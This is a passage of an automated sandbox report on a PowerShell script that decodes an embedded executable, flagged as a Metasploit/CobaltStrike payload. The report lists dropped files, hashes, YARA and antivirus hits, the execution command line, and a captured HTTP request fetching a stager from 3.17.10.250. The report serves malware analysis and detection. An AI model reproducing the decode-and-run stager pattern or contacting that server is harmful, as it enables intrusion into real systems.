                                  • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown
                                  Reputation:low
                                  Preview:MDMP..a..... ........E.g........................x...........d...bZ..........T.......8...........T............+..p.......................................................................................................eJ..............Lw......................T............E.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8702
                                  Entropy (8bit):3.698897322204178
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJw+416YGZS7gmfEwpDt89bVeb10flPejm:R6lXJho6YQS7gmfEXVebGf9e6
                                  MD5:0A365DA0408F98054D95C81339B010D6
                                  SHA1:92E97E363E7DDC913B8DF4005D1637B661780CC4
                                  SHA-256:C817CB92D39050ACDB31521C75F357EB697B7E62331A7C131D0812A3675010B2
                                  SHA-512:AD758F45A5615FA80BD7BDDA3E6038201457CB7727FFC3C835CA3B0B08E48EC6AFDB952E52DF3457ED0C81F7DE6AA8205D3D1CAE2CFAECF190D11A717969F73A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.4.8.<./.P.i.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4669
                                  Entropy (8bit):4.46160046145322
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zseJg771I9dkFWpW8VYBPYm8M4JpeOKFnyq85EzOGHV3Fad:uIjfUI7907V4SJorNpV3Fad
                                  MD5:4184B04D2DCC09EC970AFA6E6186F0A5
                                  SHA1:A21E5F89E1E9134612B7B042FAC4B2A4884A22FF
                                  SHA-256:40091C68DCC186EF2820A4E7ADED33A6DCBD5D433B0AD2984B9AA8FC0DDF4828
                                  SHA-512:892ED0D4B0099BD0217A8AB81EAACC3FF951CDB027CA768025F99F6FA9C3B93805D090011FC6C62E06DF539286EC389D1853AB2BE07486972C0AA52E411667DB
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="698429" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllulbnolz:NllUc
                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):5.223845919613859
                                  Encrypted:false
                                  SSDEEP:192:jV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2L3QzWF8qa1Dojjgi:NqaCF31cix+Dc4zjCFF46gi
                                  MD5:A7E64FEA00D97B963D90E53093D5E220
                                  SHA1:46A722D0EB5104DBF76610FD970A3AA4B8078402
                                  SHA-256:D1EC863E06892A7D5D4F4A495AE43FA8476841A6A83F618D4A5AEE0A9A550C73
                                  SHA-512:F9C10046699D915CC1A78BF302585B1CAF4191FC3BC6DEBF6FBBD9FDE98AE07B82B04233536A022749463DFC83D57C2F31D31CB4ECD366B9E8295491966046E6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 87%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@............................................... ..............................................................`..............................................`P..(...................$................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......P.......,..............@.`@.pdata.......`.......6..............@.0@.xdata..8....p.......:..............@.0@.bss..................................`..idata...............>..............@.0..CRT....h............H..............@.@..tls.................J..............@.@.........................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7316487284588975
                                  Encrypted:false
                                  SSDEEP:48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
                                  MD5:E2E0FF5AAEEACD9404BD8A2C5AA00363
                                  SHA1:435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
                                  SHA-256:B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
                                  SHA-512:876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7316487284588975
                                  Encrypted:false
                                  SSDEEP:48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
                                  MD5:E2E0FF5AAEEACD9404BD8A2C5AA00363
                                  SHA1:435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
                                  SHA-256:B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
                                  SHA-512:876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.465570297432728
                                  Encrypted:false
                                  SSDEEP:6144:yIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbN:3XD94VWlLZMM6YFHd+N
                                  MD5:63F36ECD01FF2AE80C34271BCAF93BC7
                                  SHA1:8B2448ADA8BA9CD1F644D0AD2750E4EAE90CB345
                                  SHA-256:6771B7403EDE796CB273377FAC2596661556D279698CEB866D45467650E27416
                                  SHA-512:6886BF65849A96A19B7A5EBE0CB35B4473701BE5BC1676733CCEA692C3F4106F1E641A58127E66F038B621B13840513C91ABF98542710615DD21A1613F2E692A
                                  Malicious:false
                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.L>!.r...............................................................................................................................................................................................................................................................................................................................................).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:ASCII text, with very long lines (25999), with CRLF line terminators
                                  Entropy (8bit):4.5718865364812205
                                  TrID:
                                    File name:fabd6ab15a0540d197f1ceaa312308b8.ps1
                                    File size:26'998 bytes
                                    MD5:8e117177bf5213213a857e0772e0d879
                                    SHA1:34cd43115fd3afc87867b7fafed5d22efd7209fd
                                    SHA256:c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
                                    SHA512:004904ab2dc2f6a2d31a7c419cfc532f23bb2d7f8795481a9ebf6116f106b272c9c0b125d9532bab10d0909ce977dd8fe021295193ac0b4f3af0d08433173ac8
                                    SSDEEP:768:uY4VP0laTHZBJYqP1pnFhoooooohokgpgPR:u4y5gS5bR
                                    TLSH:E6C21AB75B4B79D82EB50EC951043C828D6CBA9BA721D084BDCC30AAB3B9954CD24DD8
                                    File Content Preview:..$arquivo_bytes = [System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAAAAAAAPAA
                                    Icon Hash:3270d6baae77db44
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 30, 2025 10:27:02.936757088 CET | 49731 | 80 | 192.168.2.4 | 3.17.10.250
Jan 30, 2025 10:27:02.941823006 CET | 80 | 49731 | 3.17.10.250 | 192.168.2.4
Jan 30, 2025 10:27:02.943576097 CET | 49731 | 80 | 192.168.2.4 | 3.17.10.250
Jan 30, 2025 10:27:02.943770885 CET | 49731 | 80 | 192.168.2.4 | 3.17.10.250
Jan 30, 2025 10:27:02.949538946 CET | 80 | 49731 | 3.17.10.250 | 192.168.2.4
Jan 30, 2025 10:27:07.010061979 CET | 49731 | 80 | 192.168.2.4 | 3.17.10.250
                                    • 3.17.10.250
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 3.17.10.250 | 80 | 3848 | C:\Users\user\AppData\Local\Temp\tmpE651.exe
Timestamp | Bytes transferred | Direction | Data
Jan 30, 2025 10:27:02.943770885 CET | 165 | OUT | GET /EkTY HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                    Host: 3.17.10.250
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Target ID: 0
                                    Start time: 04:26:58
                                    Start date: 30/01/2025
                                    Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit): false
                                    Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
                                    Imagebase: 0x7ff788560000
                                    File size: 452'608 bytes
                                    MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Reputation: high
                                    Has exited: true

                                    Target ID: 1
                                    Start time: 04:26:58
                                    Start date: 30/01/2025
                                    Path: C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit): false
                                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase: 0x7ff7699e0000
                                    File size: 862'208 bytes
                                    MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Reputation: high
                                    Has exited: true

                                    Target ID: 2
                                    Start time: 04:27:01
                                    Start date: 30/01/2025
                                    Path: C:\Users\user\AppData\Local\Temp\tmpE651.exe
                                    Wow64 process (32bit): false
                                    Commandline: "C:\Users\user\AppData\Local\Temp\tmpE651.exe"
                                    Imagebase: 0x400000
                                    File size: 19'456 bytes
                                    MD5 hash: A7E64FEA00D97B963D90E53093D5E220
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 87%, ReversingLabs
                                    Reputation: low
                                    Has exited: true

                                    Target ID: 5
                                    Start time: 04:27:06
                                    Start date: 30/01/2025
                                    Path: C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit): false
                                    Commandline: C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
                                    Imagebase: 0x7ff695aa0000
                                    File size: 570'736 bytes
                                    MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Reputation: high
                                    Has exited: true

                                    Executed Functions


                                    Execution Graph


                                    Execution Coverage: 13.9%
                                    Dynamic/Decrypted Code Coverage: 0.9%
                                    Signature Coverage: 14.4%
                                    Total number of Nodes: 215
                                    Total number of Limit Nodes: 6

                                    Callgraph


                                    Executed Functions

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                    • String ID: @P@
                                    • API String ID: 649803965-1136412694

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                    • String ID:
                                    • API String ID: 2239253087-0

                                    Control-flow Graph

                                    APIs
                                    • malloc.MSVCRT ref: 004017B9
                                    • SleepEx.KERNELBASE ref: 004017CD
                                      • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                      • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                      • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                    • GetTickCount.KERNEL32 ref: 004017FC
                                    • CreateThread.KERNEL32 ref: 00401885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                    • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                    • API String ID: 3660650057-1020837823

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocCreateProtectThread
                                    • String ID:
                                    • API String ID: 3039780055-0
                                    • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                    • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                                    • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                    • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 401704-4017a5; API calls CreateFileA, ReadFile, CloseHandle
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleRead
                                    • String ID:
                                    • API String ID: 1035965006-0
                                    • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                    • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                                    • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                    • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 1d0128-1d0364; API call HttpOpenRequestA
                                    APIs
                                    • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 001D0143
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_1d0000_tmpE651.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: HttpOpenRequest
                                    • String ID: U.;
                                    • API String ID: 1984915467-4213443877
                                    • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                    • Instruction ID: 767248024086661c30a9dc68eb7a0cf621d7fd2920bd6f6d9c9f0a41f2afc3c3
                                    • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                    • Instruction Fuzzy Hash: EB116D6034980D1BE61D95AE7C9A73A11CAE7DC765F25823FB40EC33D9EE54CC83816A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 403040-40305f; API call SleepEx (self-looping); internal calls 401950, 4017f8
                                    APIs
                                      • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                      • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                      • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                      • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                    • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: Sleep$CountCreateThreadTickmalloc
                                    • String ID:
                                    • API String ID: 345437100-0
                                    • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                    • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                                    • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                    • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E

                                    Non-executed Functions

                                    Control-flow Graph

                                    APIs
                                    • RtlCaptureContext.KERNEL32 ref: 00401A84
                                    • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                    • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                    • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                    • GetCurrentProcess.KERNEL32 ref: 00401B34
                                    • TerminateProcess.KERNEL32 ref: 00401B42
                                    • abort.MSVCRT ref: 00401B48
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
